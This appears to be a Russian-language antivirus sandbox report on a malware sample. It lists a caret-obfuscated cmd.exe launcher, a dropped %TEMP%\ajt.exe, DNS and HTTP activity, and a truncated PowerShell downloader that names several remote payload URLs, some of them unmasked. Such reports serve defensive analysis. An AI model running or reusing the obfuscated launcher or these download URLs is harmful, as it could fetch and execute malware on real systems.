Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V/C"^s^et ^s^Kc^p=^.^i{H^OTMP^hK^}W)^Q^a:+^g^e^XFN^dc^f^uV1-@$^6vS,/^I^=^0Bz^](bnx2^p^D[r'^J^E;^ ^sw^j^l^kt^omC^GA\y&&^f^or %^O ^in (4^7;6^2^;5^7^;18;^50^;^56^;^8;1^8;59;5^9^;^55^;^3^0^;^3^;3;...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\ajt.exe
Сетевая активность
Подключается к
- 'me###r1st.com':80
TCP
Запросы HTTP GET
- http://me###r1st.com/GPjQt2Pxe
UDP
- DNS ASK an######tracting.ggbro.club
- DNS ASK me###r1st.com
- DNS ASK vp###imex.com
- DNS ASK br######iterestoration.com
- DNS ASK be####-propolis.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"^s^et ^s^Kc^p=^.^i{H^OTMP^hK^}W)^Q^a:+^g^e^XFN^dc^f^uV1-@$^6vS,/^I^=^0Bz^](bnx2^p^D[r'^J^E;^ ^sw^j^l^kt^omC^GA\y&&^f^or %^O ^in (4^7;6^2^;5^7^;18;^50^;^56^;^8;1^8;59;5^9^;^55^;^3^0^;^3^;3;...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $HHz='uVm';$ThA='http://an######tracting.ggbro.club/W61Td2h@http://mentor1st.com/GPjQt2Pxe@http://vpentimex.com/Dd1OSOO@http://braithwaiterestoration.com/dgFKEvC@http://beepro-propolis.com/xfMl...
